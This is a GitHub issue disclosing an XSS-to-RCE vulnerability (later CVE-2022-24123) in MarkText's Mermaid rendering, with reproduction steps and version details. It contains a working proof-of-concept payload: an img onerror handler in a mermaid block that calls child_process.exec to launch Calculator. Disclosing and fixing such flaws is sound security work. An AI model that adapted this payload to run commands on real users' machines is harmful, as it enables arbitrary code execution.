Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS to RCE vulnerability in Mermaid rendered #2946

Closed
1 task done
wuhan005 opened this issue Jan 28, 2022 · 1 comment · Fixed by #2947
Closed
1 task done

XSS to RCE vulnerability in Mermaid rendered #2946

wuhan005 opened this issue Jan 28, 2022 · 1 comment · Fixed by #2947
Labels
🪲 pri/major Bugs will affect your normal use of Mark Text, causing you unwilling or unable to continue using MT 🐛 bug Something isn't working

Comments

@wuhan005
Copy link

Description

According to #2504 , it will add a closing element at the end, which means it tries to parse it as HTML.

  • Can you reproduce the issue?

Steps to reproduce

Insert the following code into a markdown page:

(Remove the \ in the last line.)

```mermaid
sequenceDiagram
 B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello -> B: 
\```

Expected behavior:

Language input for the fenced code block should be sanitized before being rendered.

Actual behavior:

image

Versions

  • MarkText version: v0.16.3
  • Operating system: macOS 12.1
@Jocs Jocs added 🪲 pri/major Bugs will affect your normal use of Mark Text, causing you unwilling or unable to continue using MT 🐛 bug Something isn't working labels Jan 29, 2022
@wuhan005
Copy link
Author

CVE-2022-24123 assigned.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
🪲 pri/major Bugs will affect your normal use of Mark Text, causing you unwilling or unable to continue using MT 🐛 bug Something isn't working
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants